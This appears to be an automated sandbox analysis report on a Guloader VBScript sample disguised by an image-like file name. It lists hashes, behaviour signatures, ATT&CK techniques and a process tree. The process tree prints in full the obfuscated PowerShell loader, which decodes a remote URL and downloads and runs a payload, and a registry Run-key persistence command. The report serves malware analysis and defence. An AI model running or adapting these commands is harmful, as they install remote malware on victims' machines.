Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-06-2024 08:16

General

  • Target

    IMG56758938583095883593858835Blindehjemmet.vbs

  • Size

    23KB

  • MD5

    18a025babdc4df5cb74d565b1b93e1d6

  • SHA1

    f9bd62d75f8fd2e8327eea6b324b1c5dd3d880f3

  • SHA256

    7050385c9ecb2aa84c11b687149985e1aa7a6868d4f63f6b214271d238be956c

  • SHA512

    ff5126bcedf8d7d2927160161ae2c4ecae9fe1f561d97135e92c35c96b111753045b9a6e74529f086083778fcd017ed958a5b8066cb4dd7243c0473ae566978b

  • SSDEEP

    384:zDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAv5PbK7L59LL/OF15JGty:zFcEgWIfttLKWs1v9erzdu48Av5PbIfU

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMG56758938583095883593858835Blindehjemmet.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"
        3⤵
          PID:3480
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kferters Nonfugitive Kapas Reinscribed Triarthrus Domba Simultanscenernes Pocket Goere Vagtmesters92';$Dowle = 1;Function Eleatic($Skglav){$Pendulant=$Skglav.Length-$Dowle;$Mousee84='SUBSTRIN';$Mousee84+='G';For( $Sporange=5;$Sporange -lt $Pendulant;$Sporange+=6){$Kferters+=$Skglav.$Mousee84.Invoke( $Sporange, $Dowle);}$Kferters;}function Polypragmonic($Inquilinous){ & ($Iltfattig) ($Inquilinous);}$Lrerstand247=Eleatic 'La piMAnfrsoShambzOfficiAtaralStadslKi,meaUnphi/.iffe5 r,ns.Fri e0Z.nks Opvas(TrimeW .ommi Inden MarkdBrabroSekunwalauds Feri KrokuNApollTBro t Bebyr1 jlde0Overf.Funkt0 Upra;ni.zs Bill.WSeacai S.ifnP rte6fodr,4Ester; A.ba Hexagx,nlad6Merce4 Fili;Refle Stoarsp,ltvA,ism:Chaun1devit2Teleg1 Fore.Stala0Frede)Indus ,adekGf.ligeTe,pecTile.kSammeobened/.ermi2 Mi.c0Shr,m1 Gele0Pseud0 Buld1Pet.t0Monit1Unclu Lav lFSkaariKartor,istreMezzofProtooCryptxCat.l/,nfol1Altde2Unlar1Forbr.Milde0Filma ';$Hexanaphthene=Eleatic 'UnripUVenansdepopeDenicr ellu-MembrAMizengBulnieInit nUndectUrban ';$Triarthrus=Eleatic 'Gled,hSandktUn,ostCaus,pflabb:Fejls/Speel/Bals 1 Ciga0Forha3Spira.Spagh1S.ing0.eneg6Jv st. Int.6Drmme7 Ulem.Rever1sep.a2Succe9Kommu/TruttC Ep.sa S ran BillcExag.eTre.arSinicr SkameSejtrgProteiExosksPhrygt SolbrDispoeA dent ortesArvin.AfanclC rtepUl,rak .opu ';$burrel=Eleatic 'Legis>Shrov ';$Iltfattig=Eleatic ' UnmoiVe ode Retsx .xti ';$Resflelsers='Pocket';$phenomenalistic = Eleatic 'T,rque loakcDegr.h prioUnimp Reger%Elucia RelipSvrmspTrykpdTaa,naBer,ntKurs aP ess%Tudbr\Diap,N ,aufaKreretfatuat Indre.tatsrhallugmele,a Tidsl masteUnjognTestasWid.i. ForsMTumb eEksp.d Br,n Iridi&Cou t&U pdr Unbeae TrylcBra,shM senoHered BoogitFe.ae ';Polypragmonic (Eleatic ' meta$CatawgPr,splUdstro Sca bLnm,daCu halE.nst:TitteAAnnekbregisrKinobiVirtuk IdleoLethasVegnem me,laPretor Pa,ymBegifeOptanlXanthaRetemdtaliseSmaglnPainfsOmdre=An en(Stramc ,hyrmper ed S.rg D sil/ Nedvcabide Ripst$ UndtpCordwhTidskeDi len ickeo,ebscmLaveee VildnVandkaBibellThyroiF,rtos Croct Dr,jiK,ghecA.wee)Alkox ');Polypragmonic (Eleatic ' Chud$InappgFalsklAmph.oPolypbTalmuaAppellfoku :OveruRStoreeDruesi FlamnOpsk.sMell.cP.ntarYakokiBeredb CakieS idsdR.fer=Older$Li,elTSanseraforii PtomaRatiorTor,etAnt,mhValgfr BambuHypomsPerip.Arunds EnwopHukoml lo,ei Col,tMana.(Ba se$Preprb S.uduAfblorSimplrB.ntueNock.lAbaxi)bolst ');Polypragmonic (Eleatic ' I gv[TilskNAnemoeDespot.urer. ntiS UnsuePartlrAn uvv ultiiFremmcGlggeehypocPReconoward.i,oadvnKrmmet,naldM f reaSparenka aka ChrogP.ebreDanserEjgil] L.st:Jorde:usporSf.agme DhabcTe.nouSamtarBrnepi Afr.t AktiyKakogP CenorE fagoCoccitBaginoMosekc.trygoQ,aicl Sold Bantu=Paral preoc[overcNSu,ere uretTar.a.EucalSBrekreSkindc.jrneuDominrBl,ndifo,ketFantay UnpoPL.deer,asseoContatPenlioPi.roc WhatoSligelMdrenT SubmyNonadp SkebeOstra] Boni: Mar,:As,ruTForholre.iasAn.ly1 Coop2Bovin ');$Triarthrus=$Reinscribed[0];$Sibilancy= (Eleatic ' Supe$TarbogProprlPulveoPleacbJavana.olsjlf.ske:Br,nkP,histr S preAmphisHjemliBykerfFem,lt Vagt2Kabel3 bede9Uncom=WinteN Cla,e Gur wKnap.-HulkhO UndiburorrjBagtaeH,potc an ltgibel SyrinS ,irkyDormas aspt ,safeSviptmE.sic.For.rNRed ceFluidtS.ovr.RektaW Abr eUm.ddbFr anCWoodilDryptiPomegeRenatnNo,cot');$Sibilancy+=$Abrikosmarmeladens[1];Polypragmonic ($Sibilancy);Polypragmonic (Eleatic 'Montr$ GoodPbrug rVerdeePi,cesstakoi byssfCounttSolbr2Kvikk3Lecks9.roch.Ung.iHSdesteCharaaMorgedG mcre piglr Makks Mand[S.mme$DykkeH Ruske SmokxLu enaInsecnpaahra Physp Dy fh Monit FalbhExpe.eRestrn Konge Dete]Fem.n=.tanc$LabioLcamelrStropeWay.irOppors So.utPerduaKaffenCulpadTyrol2S lsk4Sleat7 Naad ');$Herlas=Eleatic 'Ungli$ Aa ePGearvrDros.eAlarmsDa,sfiBaalff.haketDbena2Flora3Antip9flgev. BestDBe.aeoFremdwForstnRockilphaenoRemusapristdbesn,FDiffei UnhylUpwa,eReinc(Shiki$Sav.sTBlabmr Res.iL,mpha Ornir FilitskildhK,nder AntiuAgnizsDrift, Bark$AstroUZoomen Philb Dea.lconnaebronznUd incNaahihtmmeri A onnGi pogUdsa lR,ehay.hyli)Proje ';$Unblenchingly=$Abrikosmarmeladens[0];Polypragmonic (Eleatic 'Skorp$TrichgFragmlKonfeoMeva,bHjaelaMet,ll isoa:Tenanh ksneoTurfsrk mmasForstemisd.p GrapaCrysttAfdelh lexb=Backf(CykliTPra.ieFarmos Kompt Medu- jlePLievea Pr stUnmodhDemoc Glee$Ob,erUKollanTopunbCigarlVejrseWortsnun dvcB.omshPimpliOrininHegneg Ja,tlSacheyDobbe)S ill ');while (!$horsepath) {Polypragmonic (Eleatic 'hersk$KabelgFatuil StemoTil.jbDug ea,ortolBombe:bordaHUdnvneFasc lDesmet Cyane Toisd Mythi progg FejltAfboeeSa,ran Re.aepulersFo,ne=Afs.u$.engetRituar.nderu Ing,emilit ') ;Polypragmonic $Herlas;Polypragmonic (Eleatic ' U,plSBeskatBl,odaSolmorGarvetfirsa-SanscSNidstlcolybesainte Wildp tele chora4befol ');Polypragmonic (Eleatic 'Runei$Aabengfel.mlA ridoSup,rb HeweaKnuselkuver:ostrahOp.agoKautirVo.casKondee TrnipSporva Weigt DetrhMi.it= Cor,(YmperT Igane .letsDeplet,hoto-OmaniPTidebaAcinatLedgeh Vulc Ro le$ForbrUBeslgnShackbOnestlKunsteLoch,nSadelcStrenhBra,diGuld,n Sad gSignalLevetyRavne)Torr, ') ;Polypragmonic (Eleatic 'Oparb$Skralg F,ltlFortio unprbE hauaPass.lMilie:MoralKAfkrsaViraspFo itaForsisPros =Fotos$Disbogre.ogl App o LongbIndisaSpoillTil n: .utgN Enkeo Orn.n VenefGenseuBonedg ColliNon utDobbeiL dervKampmeForc.+.irok+ mack%rhaet$RhabdRLevereMin,ri ,ntenActinsOmdancExtrer,yfusi DissbRkkeueUn ondScree.Ansttc Eur.ofossru.althnAarsttDatas ') ;$Triarthrus=$Reinscribed[$Kapas];}$Alpid169=285050;$Krftcellen=28120;Polypragmonic (Eleatic 'Soldi$No,esgPar,dl,yggeo ,kkobBe pea InstlHeksa:DemisG Bas.oUren eSpej.r Skrsepil s Enked=Outsi ,erumGSha.te plurtClear-BilleCPennyo ProbnCandutvalbye Tr enPaatetDi ku In.e$ LyskUFrstenPrerobSkystlBro.ee RoyanChamfcKa,tohInd aiPasten,ocesgStylolP otoy B,oc ');Polypragmonic (Eleatic ' Proi$Afsm.g,nsatlDirekoUnderbtelega XenolO ont: Re,rmRetr.a I.pogHaed.tZi,pesDherip C.umrWa,kiogalejgS,ramsSithe Co,vi=Antia odif[ blokS imenyThearsOverstReture .ontmD,cry..mphiC B jaoCommon,ottsvS.umse HandrversitKontr]Sempe: D.pr:Fl,gtFF.rinr Pit oIndanmFasciB PandabaandsrelateD ris6 Adst4RedbeSHornltLabelr.ersoi eputnSteckgHaema(Fo.ds$DegueGMassaoKlas,e HandrNosopeMi,ut)Cadge ');Polypragmonic (Eleatic ' He.l$RapatgRi ualStrimo primbTvre,aLabbelFeria:T.bakMscr.uoTam.onDefibtSabbae,imerrGnaskeHu ann disbdFejlmeM dersTekst Indig=Kl.mm Sttte[InhalS A,beyhypers.isagtHemiseIntrom Radi.dubisTFasteeVrd gxLubr tSpkni.StrumE E.bonUltracKri toGeo.odCoanuiUngosn .issg rada]Parts:Vi ce: p.akAMi.joShjre,CalfelI Ky,hIAchro..ndocGsmooteBestst Ou.cSPronitPen.urAfl eiEvolunKlvergMedy (re,ge$sigbjmAvidoaFiskegProsptMuttos HaanpUne,orGran,o TogfgCountsSe.qu)thing ');Polypragmonic (Eleatic 'Xan.h$ Reimg conolSign,oElsewbGribea ,etrl Nucl:ElectPFullooGamlioVask,lAflvnhB,gataOms,al C.eel Futu=Und.r$MarioMIndbio DaftnHabittcorozeVesterPaloneFishpnAgnesdPanate KeglsMedio.OkkersNon,muFurnibMorgusDucaltSoranrKontriLie,hnFaldegQue i(Cauks$UnshaAGeneolM,rkepLavagiVerdedWicke1Lvspr6I sen9 Int,, Cigs$VidunK,eforrKatatfAtomptDisprcKlun,eEpihilUtil,lLead.eHumorneuxan),iskr ');Polypragmonic $Poolhall;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:820
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nattergalens.Med && echo t"
            4⤵
              PID:1432
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2704
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3824
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kajpladsens115" /t REG_EXPAND_SZ /d "%Touchere% -w 1 $Limpish=(Get-ItemProperty -Path 'HKCU:\lewing\').Kapitalkonti;%Touchere% ($Limpish)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1452
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4744 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:4984

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        2
        T1112

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgaipcze.kxb.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Nattergalens.Med
          Filesize

          407KB

          MD5

          bc4f5aff2f4ae56dce61f5e04f8613eb

          SHA1

          6fa50ea97319650309e96b55696c198003634874

          SHA256

          7ecf5fecf64cf7d7f0f6bcae993f1f35687ae5c37eb3a80bd7422eb4eb1f6114

          SHA512

          a6adcda7a3ac80f1283590055890af00d83db9f0cc72a3c241b767dc9931fdad77723d6ca39ea7489d72dd9144d788e001f4c6341b4fa52e9399add295359a0d

        • memory/820-31-0x0000000006480000-0x000000000649E000-memory.dmp
          Filesize

          120KB

        • memory/820-37-0x0000000008930000-0x0000000008ED4000-memory.dmp
          Filesize

          5.6MB

        • memory/820-32-0x0000000006510000-0x000000000655C000-memory.dmp
          Filesize

          304KB

        • memory/820-41-0x0000000008EE0000-0x000000000CE78000-memory.dmp
          Filesize

          63.6MB

        • memory/820-16-0x0000000002AB0000-0x0000000002AE6000-memory.dmp
          Filesize

          216KB

        • memory/820-17-0x0000000005570000-0x0000000005B98000-memory.dmp
          Filesize

          6.2MB

        • memory/820-18-0x0000000005510000-0x0000000005532000-memory.dmp
          Filesize

          136KB

        • memory/820-19-0x0000000005C10000-0x0000000005C76000-memory.dmp
          Filesize

          408KB

        • memory/820-20-0x0000000005BA0000-0x0000000005C06000-memory.dmp
          Filesize

          408KB

        • memory/820-26-0x0000000005D80000-0x00000000060D4000-memory.dmp
          Filesize

          3.3MB

        • memory/820-36-0x0000000006A90000-0x0000000006AB2000-memory.dmp
          Filesize

          136KB

        • memory/820-33-0x0000000007D00000-0x000000000837A000-memory.dmp
          Filesize

          6.5MB

        • memory/820-35-0x0000000007720000-0x00000000077B6000-memory.dmp
          Filesize

          600KB

        • memory/820-34-0x0000000006970000-0x000000000698A000-memory.dmp
          Filesize

          104KB

        • memory/2704-43-0x0000000001000000-0x0000000004F98000-memory.dmp
          Filesize

          63.6MB

        • memory/2704-52-0x0000000001000000-0x0000000004F98000-memory.dmp
          Filesize

          63.6MB

        • memory/3972-11-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
          Filesize

          10.8MB

        • memory/3972-6-0x000001FF7F390000-0x000001FF7F3B2000-memory.dmp
          Filesize

          136KB

        • memory/3972-39-0x00007FFEAC103000-0x00007FFEAC105000-memory.dmp
          Filesize

          8KB

        • memory/3972-40-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
          Filesize

          10.8MB

        • memory/3972-13-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
          Filesize

          10.8MB

        • memory/3972-12-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
          Filesize

          10.8MB

        • memory/3972-47-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
          Filesize

          10.8MB

        • memory/3972-0-0x00007FFEAC103000-0x00007FFEAC105000-memory.dmp
          Filesize

          8KB